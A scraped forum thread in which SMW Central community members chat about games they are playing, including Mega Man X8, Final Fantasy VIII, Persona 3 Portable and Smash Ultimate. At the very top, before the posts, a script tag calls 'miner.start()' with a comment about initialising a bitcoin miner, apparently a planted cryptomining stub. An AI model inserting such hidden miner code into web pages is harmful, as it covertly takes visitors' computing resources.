<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Bean

Re: What games are you playing?

Postby Bean » 2 months ago

I finished off a replay of Mega Man X7 last night. There are legitimate times where you won't jump when you want to, most notably on the green plane to green plane transfer in Wind Crowrang's stage. Moving on those planes is not fun at all. Game exists. Just like X5 and X6, it's bad in its own unique way.

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 1 month ago

Finished off X8 today.
Got pretty pissed off in the final level with some of the platforming around spikes required. There was one jump where I don't think it would have been possible if I hadn't gotten the foot part for X that allows him to jump twice as high? And even then I could just barely make it, I don't know what the intended method was.
Final boss had a few too many phases for my taste. I also found it pretty bullshit in the final phase where the boss stops really attacking and you have to kill it within a certain amount of time or you get mysteriously insta-killed and have to redo everything.

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 1 month ago

Oh yeah, also on the second-to-last stage, after I had fought all the mavericks and got to the first "Sigma" fight, I fought him once, died, came back, skipped the cutscene, and then the battle started with X still in cutscene mode I guess. Sigma's AI was going but X couldn't be damaged, I couldn't move, I couldn't pause, I couldn't do anything. Completely softlocked. Had to reset and do the boss rush all over again.

Slimeman01
Thank Goodness I Stopped at Subway Before This Mission!
First name: Matt
Pronouns: he/him/his

Postby Slimeman01 » 1 month ago

So, I just got the "PERFECT" screen on Wario Land 3 (Not going for Music Coins, golf ain't worth it), and I gotta say, I really enjoyed it!
I love how every level expands after you levels, and it's really fun to go back to previous levels and find out where you can go with your new abilities!
The only thing I didn't like was the huge knockback, but I get why its there, so I can't complain tooooo much
Great game, really hoping for a HD re-release, or heck just give us a new game!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

Bean

Postby Bean » 1 month ago

Playing my own file of Super Mario Party now. It's still all right and even good at times.

Bean

And completed Super Mario Party yesterday. Good game, all things considered. No clue what to move on to next.

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 1 month ago

I have done nothing but play Warframe for 4 weeks.

DELTARUNE Chapter 1 broke me out of my Warframe-induced haze for a single day. More on that later. Or probably in the Deltarune thread.
BOB is an acronym for BOB is Only BOB etc.

Bean

Diablo III of all games in a co-op run. I wasn't expecting it to play like it is, but that just goes to show you how there are so many genres I just don't get around to playing, I guess. It's basically Nine Parchments, but darker colors, actual equipment options, and procedurally generated dungeons.

pholtos
Loves adorable things.

Postby pholtos » 1 month ago

And that's FF8 finally finished. Game took til the end of Disc 1 to grab me.
What the heck is that plot. Time travel is a no no. :P
The gimmick of this game, junctions, was fairly interesting, albeit a bit hard to get used to. Big bads made sense, good progression. Had a couple times where I legit didn't know where to go or how to go about getting to a place. But at least for the most part it was easy to figure out how to traverse areas, which should never be a difficult thing to determine (lookin at you, awkward to traverse FF7). Overall I place this game slightly higher than 7 in my list.
Between when I played 7 and when I finished up 8, my rankings changed up a bit. Given I'd actually play 1 and 2 again but probably wouldn't play 7 again, that would make it worse in my eyes. So I put it there. 8 is sorta similar, but better off.
Updated rankings:
Amazing:6|Great:X,5|Good:2,1|OK but never again:8,7|Take it far far away:3,4
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.
Currently playing:

Griflion
I'm gonna chomp ya!

Postby Griflion » 1 month ago

Take it far far away: 3,4
Sry pholty, we can't be friends anymore.

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 1 month ago

pholtos wrote: Game took til the end of Disc 1 to grab me.
Wow, and for me that's the point everything interesting completely falls apart. VIII is easily the FF game I can write the most angry words about - that is, I don't hate it, I try not to waste words on hate, but I really do enjoy picking/tearing it apart compared to all other FFs. It's a delightful mess from my perspective, a complete failure as a story, narrative, romance, or a mechanical gameplay experience yet somehow enthralling. I won't deny that the music and cinematography helps a lot.

Mini Metro! My new wind-down game. Surprisingly stressful at times though, drawing lines to connect abstract stations based on real-world tube maps is genuinely satisfying. Love the audio design, simple and effective.
BOB is an acronym for BOB is Only BOB etc.

Parama

Postby Parama » 1 month ago

Yeah I found mini metro too stressful/kinda luck-based to wanna play much of unfortunately
If I was suffering, I’d cut the ties that were never meant to bind.

Celeste Golden Strawberry Challenge (Spoilers):

Alice
💙
Pronouns: Girl person

Postby Alice » 1 month ago

I've been replaying Persona 3, or rather finally getting around to playing through Persona 3 Portable. The cards system it has makes it a lot easier compared to the original. Much easier to give personas skills of every element and upgrade their stats. Which is a good change in my opinion. I was on easy mode when I originally played through Persona 3 and despite having a fairly overpowered built there (I'd saved all my stat cards throughout the game and used them all on a Mithra persona which had 3/4 main element spells at high levels) I still had trouble beating the game even at level 70.

Granted I'm cheating more in this play through because I'm not as interested in doing it legit since I've already done that. Using code that get me a lot of money, guaranteeing enemies drop items, and always being in great status helps make things feel a bit less tedious. (Also maxing out academics, charm, and courage at the beginning of the game so I can just focus on maxing social links.) Still need to get further before I can create the persona I want to make though which is the Alice persona. I intend to max out her stats, get her Die For Me! skill and dark boost, then use cards to give her Invigorate 3 (+7sp at the beginning of every turn), Spell Master (halves spell costs), and then spells of each main element.

Doing things this way has been a lot more fun at least. Just got the final member of my main party that I regularly use too which is Koromaru. (Him along with Mitsuru and Yukari tends to be my endgame team.) And speaking of Koromaru that brings me to an odd observation. You only have Aigis in the game for like a week before getting Koromaru. That's really not very much time at all, especially compared to the others.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 4 weeks ago

ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

hardcore_crispy
Arrangements in fulminating vective

Postby hardcore_crispy » 4 weeks ago

I just discovered that The Dishwasher: Vampire Smile was on Steam, so that's gonna be the next thing I pl-
Oh shit.

https://www.youtube.com/user/CrispyMWHC -- I play the games for the internet.
Currently playing: A Super Mario Bros X Thing: Prelude To The Stupid

SAJewers
hi

Postby SAJewers » 4 weeks ago

Picked up Sunset Overdrive yesterday now that it's finally out on PC after all those years. Still quite fun.
ImageImageImageImage
ImageImageImageImage

Bean

Postby Bean » 3 weeks ago

Just Mega Man X8 and Fire Emblem Heroes. Pretty sure I'm not beating a new game this month, and that's fine. It's been a pretty fun month outside of that all anyway.

BurntTenda
defeat four ducks

Postby BurntTenda » 3 weeks ago

This just in:
I'm real bad at Devil May Cry.
Something goes here sometime.

Bean

Postby Bean » 2 weeks ago

Finished my Mega Man X8 run last night. All I have left is to edit a couple more clips of the item collection run together, and we're good to go on getting this done.

warpio

Postby warpio » 2 weeks ago

I'm playing Save Me Mr Tako. It's a really cute simple indie sidescrolling adventure/platformer with Game Boy style graphics and sound. I thought this would just be a really short game I could get done in an afternoon or something, but no it has a lot more content than I was expecting. It's not a Metroidvania, it has linear platforming levels with some exploration and puzzle solving involved, and it also has towns and NPCs/sidequests and such like in your average SMBX game. Another thing I'm surprised about is how well written the story to this game is. I would almost compare this to a Zelda game in terms of the quality of the story and characters and dialog. Tako is a lot like Link, a silent protagonist that just goes around helping people and getting himself deeply involved in the plot just due to his selfless heroism.

Bean

Postby Bean » 2 weeks ago

I've played a bit of that Tako one. It's really interesting with the hat system, but I haven't been able to play much of it lately.

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 1 week ago

Been playing adventure of Super Smash Bro. Ultimate, and one word of advice: check your opponents power level before you fight. Fighting an opponent with around 9000 power level with a 2000 one, even with color advantage, is not a good experience when going in blind.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Truhan
Lord of the Waifus
Pronouns: Waifulord

Postby Truhan » 1 week ago

My copy of Smash doesn't come in until Tuesday at the earliest :/ It hasn't even shipped out yet and it's literally shipping from the other side of the country for reasons I cannot even begin to fathom (it's coming from a NJ warehouse when Cali is literally right next to me? REALLY?). Trying to keep myself clean from spoilers will be a difficulty. Already bought the fighter pass, just need my cart. I also don't know if I'll be getting pirahna plant. I preordered, but because my preorder got delayed I got a bad feeling that they just won't let me have it.
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

Bean

Postby Bean » 1 week ago

jayScribble wrote: Been playing adventure of Super Smash Bro. Ultimate, and one word of advice: check your opponents power level before you fight. Fighting an opponent with around 9000 power level with a 2000 one, even with color advantage, is not a good experience when going in blind.
I've noticed. That board must be way larger than I think, too, because I've barely unlocked anyone so far. Ha-ha. Then again, the majority of my time has been playing multiplayer stuff so far.

Slimeman01
Thank Goodness I Stopped at Subway Before This Mission!
First name: Matt

Postby Slimeman01 » 1 week ago

I'm having such a blast with ultimate, and going into World of Light completely blind was definitely a good thing, as there's so much stuff to uncover here!

Also classic mode, it's so good in this mode, like holy crap. Especially the endings, they're all great!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

Return to “the cartridgé”